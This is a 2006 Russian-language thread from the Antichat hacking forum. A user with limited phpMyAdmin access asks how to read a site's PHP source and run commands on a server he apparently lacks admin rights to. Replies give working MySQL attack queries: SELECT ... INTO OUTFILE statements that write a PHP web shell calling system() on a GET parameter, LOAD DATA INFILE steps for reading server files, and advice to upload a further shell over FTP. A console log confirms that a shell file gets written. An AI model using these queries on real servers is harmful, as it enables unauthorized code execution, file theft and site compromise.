Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
MySQL...вопрос на засыпку... |
16.11.2006, 23:39
|
|
Участник форума
Регистрация: 06.11.2006
Сообщений: 129
Провел на форуме:
482261
Репутация:
58
|
|
MySQL...вопрос на засыпку...
Здравствуйте...
у меня такой вопорс к экспертам форума...
у меня есть phpMyAdmin...могу зайти в тестовом режиме...и могу выполнять SQL запросы...можно ли сформировать такой запрос чтобы, допустим качнуть файл из директории /home/docs/htdocs/index.php
в его чистом виде...т.е до обработки его сервером.
если да то помогите составить запрос...или как выполнить какую-нибдуь команду...
Заранее спасибо...надеюсь на фашу помощь...
С наилучшими пожеланиями!
|
|
|
17.11.2006, 00:21
|
|
Members of Antichat - Level 5
Регистрация: 05.04.2006
Сообщений: 1,066
Провел на форуме:
3493315
Репутация:
1228
|
|
|
|
|
|
17.11.2006, 00:28
|
|
Участник форума
Регистрация: 21.02.2006
Сообщений: 285
Провел на форуме:
1347867
Репутация:
408
|
|
Читай статью про MySQL у меня в подписи.
Вкратце:
В phpmyadmin есть функция выполнения произвольного SQL кода. Тебе нужно знать лишь установочную дирректорию сайта. Дальше лазишь по phpmyadmin и находишь таблицу и смотришь колличество ее столбцов. и составляешь запрос по типу
UNION SELECT 1,2,3...кол-во столбцов и в последнем <?php system($_GET[c]);?> FROM имя_таблицы INTO OUTFILE тут_в_одинарных_ковычках_пу ть_к_файлу_куда_писать
НО! данная вещь сработает только если у твоего юзера есть права file_priv
|
|
|
|
17.11.2006, 01:02
|
|
Участник форума
Регистрация: 06.11.2006
Сообщений: 129
Провел на форуме:
482261
Репутация:
58
|
|
nc.STRIEM
..наверно очень глупый вопрос,но все же как залить файл на сервак если у меня нету прав админа...у меня есть только строка выполняющая мои SQL запросы...очень плохо шарю в MySQL...
LoFFi
твой способ еще не порбывал не было времени, но всеравно спасибо...
заранее спасибо
Последний раз редактировалось RedBull@12; 17.11.2006 в 01:04..
|
|
|
|
17.11.2006, 01:20
|
|
Members of Antichat - Level 5
Регистрация: 05.04.2006
Сообщений: 1,066
Провел на форуме:
3493315
Репутация:
1228
|
|
Сообщение от LoFFi
UNION SELECT 1,2,3...кол-во столбцов и в последнем <?php system($_GET[c]);?> FROM имя_таблицы INTO OUTFILE тут_в_одинарных_ковычках_пу ть_к_файлу_куда_писать
после этого ты получаеш доступ к cmd! далее можеш поднять ftp на своем компе, это можно сделать при помощи RPC GUI после чего, использую команды cmd залить шел!
Последний раз редактировалось nc.STRIEM; 17.11.2006 в 01:24..
|
|
|
|
17.11.2006, 08:30
|
|
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
Провел на форуме:
5339610
Репутация:
4360
|
|
Прочитать файл можно и в MySQL.
Код:
CREATE TABLE `c` (`t` TEXT);
LOAD DATA INFILE '/home/.../admin.php' INTO TABLE `c`;
SELECT * FROM `c`;
А запись шелла делается проще -
Код:
SELECT '<?php system($_GET[cmd]); ?>' INTO OUTFILE '/home/.../shell.php';
Безо всяких 1,2,3.. и FROM `table` |
|
|
|
17.11.2006, 10:27
|
|
Участник форума
Регистрация: 06.11.2006
Сообщений: 129
Провел на форуме:
482261
Репутация:
58
|
|
всем большое спасибо...
но мне сервер выдает постоянно ошибку...т.е базы он создает...но не выполняет нужный код
Код:
CREATE TABLE `c` (`t` TEXT);
LOAD DATA INFILE '/home/.../admin.php'
INTO TABLE `c`; SELECT * FROM `c`;
т.е. первую и последнию строку он читает а вот второрую нет и от вечает мне
Код:
#1045 - Access denied for user ''@'localhost' (using password: NO)
получается он фильтрует данную шнягу,а еще вопрос можно через SQL-запрос поставить пасс на весь аккаунт БД,может он тогда успокоится, или проще забить?
Последний раз редактировалось RedBull@12; 17.11.2006 в 11:15..
|
|
|
|
17.11.2006, 11:44
|
|
Умиротворенн
Регистрация: 09.12.2004
Сообщений: 996
Провел на форуме:
2386719
Репутация:
1384
|
|
>#1045 - Access denied for user ''@'localhost' (using password: NO)
Запрещена работа с файлами, так что ты ничего не прочитаеш и не сохраниш
>можно через SQL-запрос поставить пасс на весь аккаунт БД
Если у тебя есть доступ к БД mysql то можеш, если полный доступ, то можеш и права на запись поставить, хотя в этом сильно сомневаюсь.
__________________
http://madnet.name - madnet - blog | homepage (Мысли, релизы, скрипты, софт)
http://antichat.ru - Лучший сайт по безопасности
irc.antichat.ru:7771 #antichat - общение online
ГАРАНТ ФОРУМА
|
|
|
|
17.11.2006, 12:16
|
|
Участник форума
Регистрация: 06.11.2006
Сообщений: 129
Провел на форуме:
482261
Репутация:
58
|
|
ладно чуваки большое спасибо за помощь....обидно...
ну ничто долаем=))
...я думаю тема закрыта...
С наилучшими пожеланиями!
|
|
|
|
17.11.2006, 18:40
|
|
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
Провел на форуме:
5339610
Репутация:
4360
|
|
LoFFi, готов поспорить))
H:\>mysql -u root
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 2 to server version: 4.1.12a-max
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> select '<? shellcode ?>' into outfile 'h:\shell.php';
Query OK, 1 row affected (0.03 sec)
mysql> quit
Bye
H:\>type shell.php
<? shellcode ?>
H:\>
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
